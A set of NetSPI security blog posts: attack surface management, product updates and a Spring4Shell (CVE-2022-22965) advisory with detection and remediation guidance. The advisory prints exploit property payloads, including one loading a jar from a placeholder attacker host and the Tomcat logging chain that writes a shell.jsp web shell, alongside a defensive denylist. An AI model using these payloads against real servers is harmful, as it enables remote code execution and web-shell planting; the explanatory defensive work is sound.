Jake Reynolds

Jake Reynolds is an R&D expert focusing on emerging penetration testing technology. Formerly, as NetSPI's Head of Emerging Product, Jake was responsible for the company's emerging product strategy and spent time as a Principal Security Consultant helping lead internal R&D and application penetration testing services at NetSPI. He graduated with a Bachelor's degree in Computer Science from the University of Minnesota, Twin Cities with a focus on enterprise web development.
More by Jake Reynolds
Post 30089 (author ID 31), published 2023-05-02 09:00:00:

Unmanaged attack surfaces are increasingly becoming a pathway for threat actors to gain access to systems, making effective attack surface management (ASM) more critical than ever before.  

According to research from Enterprise Strategy Group (ESG), more than half of businesses surveyed (52 percent) say that security operations are more difficult today than they were two years ago. The top reasons respondents indicated for increased challenges include an evolving threat landscape and a changing attack surface.  

Given the sophistication of threats today, a comprehensive attack surface management strategy can help proactively identify gaps and vulnerabilities while strengthening security controls.  

Let’s start by breaking down what an attack surface is. 

What is an Attack Surface? 

An attack surface is an accumulation of all the different points of entry on the internet that a threat actor could exploit to access your external-facing assets, such as hardware, software, and cloud assets. 

An enterprise attack surface may include digital attack surfaces, such as:  

  1. Application attack surface 
  2. Internet of Things (IoT) attack surface 
  3. Kubernetes attack surface 
  4. Network attack surface 
  5. Software attack surface 
  6. Cloud attack surface 

Other types of enterprise attack surfaces include human attack surfaces and physical attack surfaces. 
 
In our connected environment, a company's total number of attack surfaces and overall digital footprint continues to expand, which puts external-facing assets at risk for exposures and vulnerabilities. 
 
Cloud storage adoption and hybrid work environments that rely on cloud solutions are some of the top reasons for expanded attack surfaces. Another factor is that an uptick in mergers and acquisitions can lead to acquiring assets that may be unknown, resulting in unmanaged attack surfaces. 

How Are Attack Vectors and Attack Surfaces Related?  

Attack vectors and attack surfaces are related because attack surfaces comprise all of the attack vectors, which include any method a threat actor can use to gain unauthorized access to an environment. Examples of attack vectors include ransomware, malware, phishing, internal threats, misconfiguration, and compromised credentials, among many others – vectors can also exist as a combination of these examples listed.  

As attack vectors become more complex, security teams need to identify and implement new, more effective solutions to secure attack surfaces and stay ahead of sophisticated threat actors.  

Monitoring and protecting against evolving attack vectors becomes more critical as an attack surface grows. For the purpose of this article, we’re focusing on how to effectively manage external attack surfaces since this is a common challenge many businesses face. The external attack surface remains a priority for remediation because it presents a higher risk due to its exposure to the internet. 

What is Attack Surface Management? 

Many businesses struggle to keep up with their ever-evolving attack surface. The good news is that ASM vendors equip internal teams with the data they need to make informed decisions and methodically tackle remediation efforts.
 
Attack surface management provides continuous observability and risk assessment of your organization’s entire attack surface. When coupled effectively with continuous penetration testing, attack surface management helps companies improve their attack surface visibility, asset inventory, and understanding of their critical exposures. 

More specifically, external attack surface management (EASM) is the process of identifying and managing your organization’s attack surface, specifically from the outside-in view. The goal is to identify external assets that attackers could potentially leverage and discover exposures before malicious actors do.

Attack Surface Management Use-Cases 

Through the attack surface, adversaries can exploit exposures to identify vulnerabilities that will give them access to your organization. If threat actors are successful, then outcomes will vary depending on the attack surface and other factors—but they will undoubtedly be negative.  

Common outcomes include: 

  1. Deployment of malware on your network for the purposes of ransomware, or worse, killware. 
  2. Extraction of employee data such as social security numbers, healthcare data, and personal contact information. 

Effective asset management and change control processes are challenging, and even the most well-intentioned companies often see this as an area for improvement. The right attack surface management solution should include a combination of three core pillars: human expertise, continuous penetration testing, and prioritized exposures based on risk. 
 
Common reasons to invest in attack surface management include: 

  1. Continuous observability and risk management 
  2. Identification of external gaps in visibility 
  3. Discovery of known and unknown assets and Shadow IT 
  4. Risk-based vulnerability prioritization 
  5. Assessment of M&A and subsidiary risk 

Manage Growing Attack Surfaces with NetSPI 

NetSPI’s Attack Surface Management (ASM) platform helps security teams quickly discover and address vulnerabilities across growing attack surfaces before adversaries do.   
 
Four of the top five leading global cloud providers trust NetSPI for continuous threat and exposure management, leveraging our team, technology, and comprehensive methodology to detect known, unknown, and potentially vulnerable public-facing assets. 

Learn more about NetSPI’s attack surface management solutions or request a demo. Also check out our free Attack Surface Management Tool to search more than 800 million public records for potential attack surface exposures. 

Title: Protect Your Growing Attack Surface in a Modern Environment (https://www.netspi.com/?p=30089, slug protect-growing-attack-surface, last modified 2023-05-01 16:54:39). Excerpt: Attack surface management is critical to protecting an organization's growing digital footprint in today's connected environment. Learn how.

Post 29904 (author ID 53, post type webinars), published 2023-03-23 11:14:37:
Watch Now

NetSPI's Head of Emerging Technology, Jake Reynolds, teamed up with Hacker Valley Studios for a sponsored episode on Emerging Cybersecurity Technologies.

Hacker Valley Studios chat with Jake about:

0:00 - Welcome Jake Reynolds
2:30 - What is a full stack engineer?
4:39 - Having a large cybersecurity attack surface
6:00 - Attack surface trends
8:29 - Do cloud engineers need to know networking?
10:12 - Levels of abstraction in the cloud and making sense of it
12:13 - Does bug bounty help you with your job?
15:49 - Will we see network exploits again?
16:53 - Special question from NetSPI
17:31 - Which emerging technologies are you watching?
20:30 - Have we really reached the max of ChatGPT hypes?
24:33 - What AI/ML capability does cybersecurity need?
27:28 - How do we stack the deck against the hackers?

Video: https://youtu.be/r1qRuTMhi64

Title: Emerging Cybersecurity Technologies with Jake Reynolds (https://www.netspi.com/?post_type=webinars&p=29904, slug hacker-valley-studio-attack-surface-management, last modified 2023-07-14 08:53:22).

Post 29338 (author ID 17), published 2023-02-07 09:00:00:

NetSPI prides itself on maintaining a leadership position in the global offensive security space by listening to client feedback, analyzing industry trends, and investing in breakthrough technology developments.

Over the last few months, our development teams have been busy, and are excited to introduce a variety of new features and capabilities across our Breach and Attack Simulation, Attack Surface Management, and Penetration Testing as a Service (PTaaS) solutions to help organizations improve security posture, streamline remediation, and protect themselves from adversaries.

Of the releases across our solutions portfolio, Breach and Attack Simulation (BAS) received the most significant updates, so let's start there.

Breach and Attack Simulation (BAS) 

NetSPI BAS data shows that only 20% of common attack behaviors are detected by traditional EDR, SIEM, and MSSP solutions. Although most companies spend thousands, even millions, of dollars on detective controls, very few test to validate if they work and provide the value they claim to.

NetSPI’s Breach and Attack Simulation is designed to evaluate detective control effectiveness and educate security operations teams around common TTPs across the cyber kill chain. After many invaluable feedback sessions with NetSPI clients and hours of market research, we are excited to unveil major updates to our Breach and Attack Simulation platform, dialing in on three core dashboards: the Workspace, Timeline, and Heat Map dashboards.

Workspace 

The Workspace is where red teams, purple teams, security engineers, and analysts will spend a majority of their time. Here, they can build, configure and run customized procedures to test their detective controls. Key features within the Workspace include:

  • Utilize preconfigured procedures – or customize your own – to put detective controls to the test 
  • Visualize security posture and identify gaps using detailed summary charts that update in real time. These can be saved and downloaded to easily share with SOC teams and executive leadership to highlight gaps and justify budget for new staff and technology. 
  • While in the Workspace, users can also learn about each detection phase (logged, detected, alerted, responded, and prevented) for common TTPs within the Mitre ATT&CK framework – down to the individual procedure level.  
  • The Activity Log feature allows security teams to ditch the spreadsheets, wiki pages, and notepads they currently use to track information around their detective control capabilities and centralize this information from a summary viewpoint down to the findings level, allowing streamlined communication and remediation. It will also automatically log play execution and visibility state changes. 
  • Tags allow security teams to see the number of malware and threat actors that use the specific technique, helping prioritize resources and remediation efforts. Tags can also be leveraged to generate custom playbooks that include procedures used by unique threat actors, allowing security teams to measure their resiliency to specific threats quickly and easily. 
  • Export test results in JSON or CSV, allowing the SOC team to plug information into existing business processes and products, or develop customized metrics. 

In summary, the Workspace is designed to educate and enable security teams to understand common attack procedures, how to detect them, and provide resources where they can learn more. 

Timeline 

While the Workspace shows a lot of great information, it focuses on a single point in time. The Timeline dashboard, however, allows you to measure detective controls over time.

This allows security teams to prove the value of investments in people, processes or technology. The Timeline Dashboard will also show where things have improved, stayed the same, or gotten worse at any stage of the Mitre ATT&CK kill chain.

While many competing BAS offerings show only what is being alerted on, a unique differentiator for NetSPI is the ability to filter results and show changes in what is logged, detected, alerted, responded, and prevented. These changes can be shown as a percentage (e.g. logging improved 5 percent) or a count (e.g. logging improved within two different procedures). As with the Workspace, these charts can be downloaded and inserted into presentations, emails, or other reports as needed.

For additional information on how NetSPI defines logging, detection, alerting, response, and prevention, read How to Paint a Comprehensive Threat Detection Landscape.

Heat Map

Security teams often refer to the Mitre ATT&CK framework, which shows the phases, tactics, or techniques of common TTPs and procedures seen in the wild. We know that many teams prefer seeing results in this framework, and as such, have built it into our Breach and Attack Simulation platform. BAS delivers a familiar way to interact with the data, while still connecting to the workspace created for detection engineers and other security team members.

As mentioned in the Timeline dashboard, a key differentiator is that we show the different visibility levels (logged, detected, alerted, responded, and prevented) within the Mitre ATT&CK framework coverage within each phase of the cyber kill chain and even down to each specific technique.

Here, we also have the ability to dig in and show all of the procedures that are supported within each technique category. These are then cross-linked back to the Workspace, to streamline remediation and re-testing of specific coverage gaps.

This is a quick summary of a few new features and benefits included in our updated Breach and Attack Simulation solution. If you would like to learn more, we encourage you to read our release notes, or contact us for a demo.

Attack Surface Management (ASM) 

Attack Surface Management continues to be a major focus and growing technology within the cybersecurity industry. NetSPI’s most recent ASM updates focus on organizing, filtering, and expanding on information that was previously included, but will now be even easier to locate and pull actionable information from.  

Three key new feature highlights from last quarter include Vulnerability Triggers, Certificate Transparency Logs, and the Subdomain Facet within our domain explore page.

Vulnerability Triggers

First off, what is a vulnerability? In ASM terms, a vulnerability is any exploitable condition of significant risk identified on your attack surface, found by combining assets with exposures. Although a specific asset or exposure might not be very impactful on its own, when combined into a series of steps it can result in a much greater risk.

With the recent introduction of Vulnerability Triggers, admins can now query assets and exposures for specific criteria based on preconfigured or customized search results, and alert on the ones that are the most concerning to you or your company. These Vulnerability Triggers can now be customized to search for criteria related to Domains, IPs, or Ports.

Long story short, Vulnerability Triggers allow your company to search not only for common assets, exploits, and vulnerabilities, but also for key areas of concern for your executive team, industry, organization, or project.

Certificate Transparency Logs & Subdomain Facet

The next two new features are focused on root domain and subdomain discovery.

NetSPI's ASM has searched root domains and subdomains since its creation; now we are proud to officially introduce Certificate Transparency Logs. We ingest certificate transparency logs from public data sources, which significantly increases domain discovery.

We are also excited to announce the release of the Subdomain Facet within our domain explore page. It is common for companies to have tens, or even hundreds, of subdomains on their attack surface; with the Subdomain Facet, you can now filter the common subdomains on your attack surface.

A great use case example of this is to discover development subdomains (dev.netspi.com, stage.netspi.com, or prod.netspi.com, etc.) where sensitive projects or intellectual property might be located, and unintentionally exposed externally.

Another common use case for these features is detecting subdomains that have been hijacked by adversaries attempting to steal sensitive customer or employee information.

This is a quick summary of a few new features and benefits included in our Attack Surface Management offering, however if you would like to learn more, we encourage you to read our release notes, or contact us for a demo.

Penetration Testing as a Service (Resolve™) 

NetSPI’s Resolve, our penetration testing as a service (PTaaS) platform, has been an industry leader for years, allowing users to visualize their test results and streamline remediation by up to 40%. This product would not be able to remain a leader without continued updates from our product development teams.

Recently, we have focused on delivering updates that enhance the user experience and make data within the platform more accessible and more easily leveraged within other security team processes and platforms.

AND/OR Logic

Previously, when users created filters in the grid, AND Logic, as well as OR Logic could be used on filtered search results. We are excited to introduce AND/OR Logic to filters, allowing users to combine both AND Logic and OR Logic to deliver more detailed results to their security teams or business leaders.

Automated Instance State Workflow

Finally, we have introduced automated instance state workflows to include bulk edits. Previously, this was only applicable while updating individual instance states. This change improves efficiencies within the Resolve platform for entire vulnerability management teams.

This is a quick summary of a few new features and benefits included in our PTaaS solution, however if you would like to learn more, we encourage you to read our release notes, or contact us for a demo.

This blog post is a part of our offensive security solutions update series. Stay tuned for additional innovations within Resolve (PTaaS), ASM (Attack Surface Management), and BAS (Breach and Attack Simulation).


Read past solutions update blogs: 

Title: NetSPI Offensive Security Solutions Updates: Q1 2023 (https://www.netspi.com/?p=29338, slug offensive-security-updates-q1-2023, last modified 2023-05-18 12:55:59). Excerpt: Learn how NetSPI's updates to Penetration Testing as a Service (PTaaS), Attack Surface Management, and Breach and Attack Simulation can help you better secure your environment.

Post 28733 (author ID 31), published 2022-10-25 09:00:00:

Hackers are highly motivated and incentivized to find new ways to gain access to your systems, expose your information, or even target your customers. To deliver the highest level of security and maintain a leadership position in the global offensive security space, NetSPI continues to invest in new technology, updated service capabilities, and the highest-quality teams. 

"On average, attack surface management tools initially discover 30% more cloud assets than security and IT teams even know they have," according to Forrester's Find And Cover Your Assets With Attack Surface Management report. Some tools discovered several hundred percent more assets than the organization originally knew about.

Top use cases for attack surface management technologies are asset discovery and inventory, supply chain and third-party risk management, M&A due diligence, and compliance management. NetSPI’s Attack Surface Management (ASM) development team recognized these common use cases and saw the need to categorize and sort information faster, easier, and in a more intelligent way.  

The IT and SOC teams we work with are not simply looking for more data – they are looking for more meaningful and actionable data, and our recent developments have been targeted towards that.  

As a result, we are proud to introduce two new features into NetSPI’s ASM solution: the Portfolio Dashboard and Perceptual Hashing.

The Portfolio Dashboard

The Portfolio Dashboard is, simply put, a dashboard that gives your company a global risk view of your attack surface, showing your corporate network alongside all portfolio or client networks. We've seen the most benefit from this feature in companies going through M&A processes, private equity firms, cyber insurance companies, parent companies, and conglomerates, along with many others.

Organizations using ASM can now search and filter for a specific threat or technology within their entire portfolio. This enables them to clearly display the specific assets that have potential vulnerabilities and provide actionable information in seconds. 

A well-known example where NetSPI’s ASM Portfolio Dashboard would have proven valuable is Log4Shell. Log4Shell is a remote code execution vulnerability in Apache Log4j that allowed attackers to place malware on a targeted system, leading to the potential of a completely compromised network, theft of sensitive information, and more. 

Not good! 

In this example, non-portfolio companies were struggling to identify all affected assets within their network. Portfolio companies and cyber-insurance companies needed to not only identify assets within their own network, but they also needed to identify affected assets in their clients’ networks – searching every known potentially vulnerable asset to better understand their risk, while still missing every unknown asset. 

Again, not good! 

If the Log4j crisis happened today, however, companies could leverage NetSPI's ASM Portfolio Dashboard to quickly and easily search for any affected device across their global attack surface. The potentially vulnerable assets would be displayed in a simple dashboard (as seen in the screenshot above), allowing IT and security teams to react accordingly and efficiently target the most vulnerable areas, potentially saving the company and their customers from catastrophic damage.

This is just one example of how the portfolio dashboard can benefit companies today. Although many organizations have remediated Log4Shell today, this feature can help in much the same way with other threats or technologies that may arise tomorrow, next week, or in the future. 

Perceptual Hashing

NetSPI’s current ASM offering routinely takes screenshots of all websites on your global attack surface. And we’re excited to share that the platform now includes Perceptual Hashing.  

Perceptual Hashing, sometimes referred to as Perceptual Image Hashing or Perceptual Sorting, analyzes these screenshots and categorizes them based on similar looks, styles, layouts, and images. These groups of screenshots are then reviewed by NetSPI’s ASM Operations Team to identify trends in your network or find outliers of websites running on your perimeter, and then notify your team. 

There are other types of hashing, such as average hashing, cryptographic hashing, and geometric hashing; however, perceptual hashing is the most effective for this purpose because it is designed to recognize and group similar items even when minor modifications, such as compression or brightness changes, have been made to the images. As a result, images that are similar are grouped together, while outliers are detected and grouped separately.

The intention is that if a vulnerability is found on one of your public-facing websites, Perceptual Hashing will allow you to search for similar webpages so you can review them and take action. With NetSPI’s ASM continuous penetration testing capabilities and real-time reporting, teams will know almost instantly if there are any publicly exposed management interfaces and can respond accordingly.

One of NetSPI’s ASM clients, a Fortune 500 technology company, recently used Perceptual Hashing to efficiently identify a vulnerability across various servers. The ASM Operations Team discovered a publicly exposed management interface in a proprietary web application during a routine scan, which left them vulnerable to external unauthenticated users accessing administrative functionality. The ASM team was able to take this finding and search the entirety of their other websites with the equivalent perceptual hash, identifying multiple other vulnerable servers. Once all were searched and the vulnerabilities were discovered, the team was able to report back to the company and guide them to remediate accordingly. 
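As an added illustration (not NetSPI’s implementation, which the post does not describe), the Python below computes a difference hash (dHash) over constructed 4x5 grayscale thumbnails standing in for downscaled screenshots, groups them by Hamming distance, and looks up the pages similar to a given one, which is the kind of search the case above relies on. The tile values, the screenshot names and the 2-bit threshold are assumptions for the example; it shows why a brightness shift leaves the hash unchanged, why a compression artifact moves it by one bit, and why a differently laid out page lands in its own group.

```python
from itertools import combinations

# Constructed 4x5 grayscale thumbnails (0..255) standing in for downscaled
# screenshots. A real pipeline would shrink each screenshot to a small
# grayscale tile first; these values are made up for the example.
LOGIN_A = [
    [200, 120, 120, 40, 40],
    [200, 200, 120, 120, 40],
    [40, 120, 200, 120, 40],
    [40, 40, 120, 200, 200],
]
# Same page, brighter capture: every pixel +30, so neighbour ordering is unchanged.
LOGIN_A_BRIGHT = [[v + 30 for v in row] for row in LOGIN_A]
# Same page after lossy compression: one pixel drifted, flipping one comparison.
LOGIN_A_JPEG = [row[:] for row in LOGIN_A]
LOGIN_A_JPEG[3][4] = 190
# A visually different page, the kind of outlier an operations team wants flagged.
ADMIN_CONSOLE = [
    [40, 40, 120, 200, 200],
    [40, 120, 200, 120, 40],
    [200, 200, 120, 120, 40],
    [200, 120, 120, 40, 40],
]

SCREENSHOTS = {
    "login-a": LOGIN_A,
    "login-a-bright": LOGIN_A_BRIGHT,
    "login-a-jpeg": LOGIN_A_JPEG,
    "admin-console": ADMIN_CONSOLE,
}


def dhash(tile):
    """Difference hash: one bit per horizontally adjacent pixel pair,
    set when the left pixel is brighter than the right one."""
    bits = 0
    for row in tile:
        for left, right in zip(row, row[1:]):
            bits = (bits << 1) | int(left > right)
    return bits


def hamming(a, b):
    """Number of differing bits between two hashes."""
    return bin(a ^ b).count("1")


def similar_to(name, threshold=2, screenshots=SCREENSHOTS):
    """Names of the other screenshots whose hash lies within `threshold` bits of `name`'s."""
    target = dhash(screenshots[name])
    return sorted(
        other for other, tile in screenshots.items()
        if other != name and hamming(target, dhash(tile)) <= threshold
    )


def group_screenshots(threshold=2, screenshots=SCREENSHOTS):
    """Cluster screenshots transitively: two hashes within `threshold` bits share a group."""
    hashes = {name: dhash(tile) for name, tile in screenshots.items()}
    parent = {name: name for name in hashes}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]
            x = parent[x]
        return x

    for a, b in combinations(hashes, 2):
        if hamming(hashes[a], hashes[b]) <= threshold:
            parent[find(a)] = find(b)
    groups = {}
    for name in hashes:
        groups.setdefault(find(name), []).append(name)
    return sorted(sorted(g) for g in groups.values())


if __name__ == "__main__":
    for group in group_screenshots():
        print(group)
    print("similar to login-a:", similar_to("login-a"))
```

The threshold is the tuning knob: too low and every recompressed capture becomes its own outlier, too high and unrelated pages merge. On real 8x9 tiles (64-bit hashes) a few bits of tolerance is the usual starting point.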

Other cases where NetSPI’s Perceptual Hashing feature can be used are: 

  • Servers using specific landing pages or technologies 
  • Publicly exposed management interfaces 
  • Digital rights management 
  • Data deduplication 
  • Image searching 

These are just two examples of recent innovations added to NetSPI’s Attack Surface Management solution. Although Perceptual Hashing is my current favorite feature, there are many innovations in the works right now to continue delivering the highest quality security for customers with our technology driven, human delivered methodology. 

Other noteworthy updates to our ASM solution include: 

  • New intelligent search help – when users click on the search inputs, they are presented with helpful suggestions to deliver the best results. 
  • Users in the Domain, IP Address, and Port table views can now copy selected assets and port URLs to the clipboard. 
  • Users can add an attribution statement when adding assets. 
  • Domain and IP address exports have been updated to include ports and associated assets. 
  • Domains, Ports, and IP Addresses now have all associated screenshots available to view. 
  • When viewing the full details page for a Domain, you can now use the “Generate Report” button to get a summary report specifically for that domain. 
  • The main dashboard now shows you trends of all vulnerabilities on your attack surface over time, separated by severity. 
  • On the ASNs page, the 'Scan for ASNs' button now validates and updates existing ASN associations in addition to inserting newly identified ASNs. 
  • The Port Gallery has been converted to an Explore page with left-hand facet searches. 
  • SAML SSO now supports users from multiple domains. 
  • Ability to automatically transform invalid CIDR ranges when adding assets. 
  • New port intelligence, including status code, content type, content length, site title, JARM, and HTTP reachability. 

Additional updates can be found on the Attack Surface Management changelog: https://asm.netspi.com/guide/changelog/. 

To learn more about NetSPI’s Attack Surface Management, contact your rep or connect with us here.

This blog post is a part of our offensive security product update series. Stay tuned for additional innovations within Resolve (PTaaS), ASM (Attack Surface Management), and AttackSim (Breach and Attack Simulation).

Post title: NetSPI Attack Surface Management Updates: Portfolio Dashboard & Perceptual Hashing
Source: https://www.netspi.com/?p=28733 (last modified 2023-05-18)

Next post, published 2022-04-06:

On March 29, 2022, organizations experienced widespread concern when the Spring4Shell vulnerability was disclosed. Since then, we’ve noticed a sense of confusion around the remote code execution (RCE) vulnerability and its impact.  

Before we dive into the vulnerability details, here are four facts to help you understand what Spring4Shell really is – and its intricacies: 

  • The vulnerability was leaked ahead of CVE publication and ahead of the emergency releases planned by the Spring Framework team. This small window gave time for individuals to speculate on total impact and spread unfounded claims.
  • The name “Spring4Shell” was sometimes used for both this issue (CVE-2022-22965) and another Spring vulnerability (CVE-2022-22963) related to Cloud Function Expressions. However, these vulnerabilities are unrelated and should be handled independently.
  • Spring4Shell is actually a bypass for a fixed issue from 12 years ago, CVE-2010-1622, which involves the same abuse of nested properties to access class loader objects. The issue itself stems from insecure coding patterns that Spring recommends avoiding. In addition, it depends on specific deployment and environmental requirements. All of this makes it difficult to identify affected applications. We’ll cover detection in detail later in this blog.
  • Impact is still to be determined, as there are conflicting claims about Spring4Shell being actively exploited. Initial reports compare it to Log4Shell, which has been leveraged in many known attacks since disclosure. But after analysis of the initial report, it is still unclear how many applications are truly vulnerable to attacks.  

In summary, this vulnerability was prematurely leaked shortly after the publication of another unrelated Spring issue. The name “Spring4Shell” was quickly abused in reference to the recent “Log4Shell” issue, despite the vulnerabilities having significantly different impact. Misinformation about the vulnerability quickly circulated while the Spring team was still preparing its patches and technical guidance. 

As we monitor the situation closely, we will update this blog with new details. Continue reading to learn what we know so far and how we’ve optimized NetSPI’s Attack Surface Management platform to help organizations identify vulnerable instances of Spring Framework. 

Current Status: On March 31, 2022, a patch was released by the Spring team for CVE-2022-22965

What is Spring4Shell? 

Spring4Shell is a vulnerability found in the Java Spring Core framework that could allow for remote code execution (RCE) on web servers around the world. As noted above, this issue is almost identical to an older vulnerability from 2010 and, if exploited, could allow attackers to write files to the underlying web server host, modify system configurations, or upload web shells for code execution.

The popularity of VMWare-owned Spring and the prematurely released proof of concept (PoC) generated lofty expectations of abuse. However, nuances in the technical details have revealed exploitation is slightly more than trivial and dependent on specific coding practices and deployment environments. 

Follow along with us as we break down the technical details of the issue, who exactly is affected, and how to handle the next round of vulnerability panic.

Technical Overview 

Underneath, the vulnerability depends on the unsecured use of basic Java objects (POJOs) as parameters in request mappings. The Spring MVC supports this concept to simplify the mapping of HTML form bodies to objects. Here is an example of this feature in use: 

// User.java
public class User {
    private String name;

    public String getName() { return name; }
    public void setName(String name) { this.name = name; }
}

// UserController.java
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;

@RestController
public class UserController {
    // Spring binds the request parameters straight onto a new User object.
    // No allowed-field list is configured on the binder, which is the
    // pattern discussed below.
    @RequestMapping("/adduser")
    public User addUser(User user) {
        return user;
    }
}

This code is convenient, but it goes against Spring’s guidance by not configuring allowed fields (setAllowedFields) on the DataBinder. Because this specific pattern is unusual, it is uncertain how many applications might be affected. We can use this endpoint to create a new User object with the following request:

POST /adduser HTTP/1.1 
 
name=Nick 

Upon receiving the request, Spring (specifically the Beans subsystem) will inspect the User class and try to assign properties to a new object based on the parameters provided. If a more complicated object were supplied, Spring would also allow us to supply nested properties such as this:

POST /adduser HTTP/1.1 
 
address.city.name=NewYork 

Which, through reflection, would equate to the following Java call:

UserObj.getAddress().getCity().setName("NewYork"); 

It’s here that we arrive at the primary concern. In the examples above, we’re assigning expected properties on our User object, but there are many other “hidden” properties that could be abused to access core internal classes in the Java framework. This was originally disclosed in CVE-2010-1622, where the payload accessed the URLs on a nested Class Loader object: 

class.classLoader.URLs[0]=jar:https://attacker/evil.jar!/ 
 
UserObj.getClass().getClassLoader().getURLs()[0] = 
"jar:https://attacker/evil.jar!/"; 

While the original fix blocked access to the classLoader property, the issue resurfaced in JDK 9, where the module property of a class became accessible and the classLoader could be reached through it instead:

class.module.classLoader... 
  
UserObj.getClass().getModule().getClassLoader()…;

In addition to restoring classLoader access, the leaked Spring4Shell proof of concept (PoC) took a different approach to achieving code execution. Rather than manipulating class loader URLs (which have since been better protected), the author used property walking to reach the Tomcat logging class and reconfigure its properties to achieve an arbitrary file write. In the example below, shell.jsp could be written to any filesystem path, with the file contents supplied through the pattern property.

class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
class.module.classLoader.resources.context.parent.pipeline.first.pattern=[Content]
class.module.classLoader.resources.context.parent.pipeline.first.directory=[Path]

The new fix for this vulnerability inspects properties more thoroughly and blocks access to classLoader and protectionDomain regardless of where they fall in the object graph. However, even Spring notes that this doesn’t prevent the abuse of unrestricted parameter bindings in more specific cases. Developers should understand the implications of this feature and follow the hardening guidance from Spring whenever possible.
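To make the difference between the 2010 fix, the @InitBinder workaround and the 2022 fix concrete, here is an added Python model (not Spring’s source code) that applies each policy to the property paths quoted in this post. The three policy functions are simplified approximations and are assumptions of this example: the original fix is modelled as refusing classLoader only when it is read directly off a Class object, the workaround as the glob denylist from the remediation section, and the new fix as refusing classLoader and protectionDomain at any depth. Running it shows why class.module.classLoader slipped past the older check and is caught by the newer two.

```python
import fnmatch

# Denylist from the post's @ControllerAdvice workaround.
WORKAROUND_DENYLIST = ["class.*", "Class.*", "*.class.*", "*.Class.*"]

# Properties the post says the 2022 fix refuses at any depth of the object graph.
SENSITIVE_SEGMENTS = {"classLoader", "protectionDomain"}


def segments(path):
    """Split a dotted property path, dropping indices: 'URLs[0]' -> 'URLs'."""
    return [seg.split("[", 1)[0] for seg in path.split(".")]


def blocked_original_fix(path):
    """Approximation (assumed) of the CVE-2010-1622 fix: classLoader is refused
    only when read directly off a Class object, i.e. right after a 'class' segment."""
    segs = segments(path)
    return any(a == "class" and b == "classLoader" for a, b in zip(segs, segs[1:]))


def blocked_by_denylist(path, patterns=WORKAROUND_DENYLIST):
    """setDisallowedFields-style check: simple '*' glob patterns over the whole path."""
    return any(fnmatch.fnmatchcase(path, pattern) for pattern in patterns)


def blocked_new_fix(path):
    """Approximation (assumed) of the CVE-2022-22965 fix: a sensitive property is
    refused wherever it appears, so class.module.classLoader is caught as well."""
    return any(seg in SENSITIVE_SEGMENTS for seg in segments(path))


def classify(path):
    """Outcome of each policy for one property path; True means binding is refused."""
    return {
        "original_fix": blocked_original_fix(path),
        "workaround_denylist": blocked_by_denylist(path),
        "new_fix": blocked_new_fix(path),
    }


if __name__ == "__main__":
    # The paths are the ones quoted in the post: two legitimate bindings,
    # the 2010 payload prefix and the 2022 bypass prefix.
    for p in [
        "name",
        "address.city.name",
        "class.classLoader.URLs[0]",
        "class.module.classLoader.resources.context.parent.pipeline.first.prefix",
    ]:
        print(f"{p}: {classify(p)}")
```

The lesson carried by the model is that a denylist anchored on one position in the graph is brittle: any new reachable object that exposes the same sensitive property reopens the path, which is why Spring’s guidance favours an explicit allowed-field list for form-backing objects over blocking known-bad paths.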

Am I Affected by Spring4Shell? 

Exploitation of the vulnerability depends on specific coding patterns and deployment environments, both of which make the issue difficult to identify with simple scanners. Any individual web endpoint (authenticated or not) in an application could be affected. As a first step, we encourage you to connect directly with your development teams to assess application dependency trees.  

According to the Spring team’s report, those who meet the following criteria are affected by the Spring4Shell vulnerability.  

  • Java Development Kit (JDK) 9 or higher 
  • Apache Tomcat as the Servlet container 
  • Packaged as a traditional WAR (in contrast to a Spring Boot executable jar) 
  • Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions 
  • spring-webmvc or spring-webflux dependency 

Spring4Shell Detection 

For better or worse, this vulnerability is difficult to detect remotely from a blind context. As mentioned, any endpoint in an application might be affected, and requirements like authentication might result in many false negatives. Here is a breakdown of our recommended detection strategies:

  • Contact internal development teams to identify custom applications that leverage the Spring framework. Vulnerable versions are noted above and there are multiple options for patching and mitigations. There are also local scanners available to help search for affected JAR files on the system.
  • Monitor vendor sites for references to CVE-2022-22965/Spring4Shell to identify and patch third-party applications.
  • External web requests can be used as a primitive detection for this vulnerability. When certain invalid data is provided for property resolution, the server often returns a different status code (400/500). Scanners can send multiple requests to web endpoints and look for status codes that vary with the input; this is a good indication that access to nested classLoader objects is allowed.

Additionally, NetSPI has optimized our Attack Surface Management (ASM) platform to detect Spring4Shell at scale and in unique scenarios. Our team of pentesters, researchers, and developers research, triage, and discover new vulnerabilities daily. As they are disclosed, new vulnerabilities are added to our ASM platform for continuous monitoring. For our current external network penetration testing customers, we have updated our processes to include Spring4Shell testing for in-scope projects.

As ubiquitous vulnerabilities like Log4Shell and Spring4Shell become more prevalent, understanding your attack surface has never been more important. Those that proactively and continuously monitor and inventory their attack surface will be in better shape to find and address vulnerable instances of Spring Framework in a fast and comprehensive manner. 

Spring4Shell Remediation 

The Spring Framework team has since released fixes for the vulnerability. Make sure you update to Spring Framework 5.3.18 or 5.2.20, or later.

Where that isn’t possible, the following code can be added to secure parameter bindings, although the Spring team notes this might not be comprehensive in every circumstance.

import org.springframework.core.Ordered;
import org.springframework.core.annotation.Order;
import org.springframework.web.bind.WebDataBinder;
import org.springframework.web.bind.annotation.ControllerAdvice;
import org.springframework.web.bind.annotation.InitBinder;

@ControllerAdvice
@Order(Ordered.LOWEST_PRECEDENCE)
public class BinderControllerAdvice {

    // Applied to every controller's WebDataBinder: refuses any property path
    // that starts with, or passes through, a "class"/"Class" segment.
    @InitBinder
    public void setAllowedFields(WebDataBinder dataBinder) {
        String[] denylist = new String[]{"class.*", "Class.*", "*.class.*", "*.Class.*"};
        dataBinder.setDisallowedFields(denylist);
    }

}

If you are running older Spring Framework versions or can’t make the update, Spring published these workarounds for you.  

Additionally, Apache Tomcat, one of the preconditions, released new versions to close the attack vector on Tomcat’s side. In their post, they point to the importance of having multiple mitigation options that “provide flexibility and layered protection.” 

When seemingly critical vulnerabilities like Spring4Shell are brought to light, it’s important to identify reliable resources and peers that can help you understand the vulnerability nuances.  

We hope this blog helped you better understand the vulnerability, its impact, and your options for detection and remediation. NetSPI is available to walk through our detection process and help you navigate the complexities this vulnerability presents. Please contact us to learn more. 

Do you use vulnerable versions of the Spring Framework?

